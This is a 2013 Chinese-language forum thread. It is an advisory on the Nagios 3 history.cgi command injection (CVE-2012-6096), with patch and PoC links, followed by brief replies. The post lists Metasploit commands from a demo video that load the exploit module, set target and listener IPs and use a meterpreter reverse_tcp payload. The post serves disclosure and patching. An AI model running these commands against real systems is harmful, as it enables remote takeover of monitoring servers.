微剋多資訊

 找回密碼
 註冊

Login

Login

搜索

該用戶從未簽到

發表於 2013-1-18 14:33 | 顯示全部樓層 |閱讀模式
主題:Nagios 3 監控主機的 history.cgi 漏洞 (含影片示範)

發佈日期:2012/12/09(首次發現)、2013/01/10(發佈PoC)

影響版本:Nagios v3.4.3 (含之前所有版本)

漏洞編號:CVE-2012-6096

說明:
Nagios 是一個流行的電腦系統和網路監控程序,它檢測主機和服務,當異常發生和解除時能提醒用戶。
這個漏洞屬於 command injection ,主要是未經修補的漏洞主機可以直接查看 history.cgi 裡面的網頁資料。

官方網站說明:
簡單講請盡速更新到 Nagios v3.4.4 的版本修正漏洞的影響。
http://www.nagios.org/projects/nagioscore/history/core-3x

概念驗證程式(PoC)下載處:
http://www.securityfocus.com/bid/56879/exploit

其它參考網站說明:
http://lists.grok.org.uk/pipermail/full-disclosure/2012-December/089125.html

影片內指令:
use exploit/unix/webapp/nagios3_history_cgi
set RHOST 192.168.178.44
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit
getuid
sysinfo


From https://www.facebook.com/netwargame

該用戶從未簽到

發表於 2013-1-18 15:38 | 顯示全部樓層
知名監控軟體安全性也開天窗
幸好有提供了修補,儘快修正就好,總比Jxxx還修補不完全來的好
回覆

使用道具 舉報

該用戶從未簽到

 樓主| 發表於 2013-1-18 20:11 | 顯示全部樓層
Java 可能是因為比較多人在用 所以比較多人在研究漏洞

我是這麼認為的拉!
回覆

使用道具 舉報

該用戶從未簽到

發表於 2013-1-18 23:49 | 顯示全部樓層
這套軟體沒用過
應該能彌補防火牆的漏洞
回覆

使用道具 舉報

您需要登入後才可以回帖 登入 | 註冊

本版積分規則

小黑屋|Archiver|微剋多資訊(MicroDuo)

GMT+8, 2016-12-11 12:04

Discuz! X

© 2009-2016 Microduo

快速回覆 返回頂部 返回列表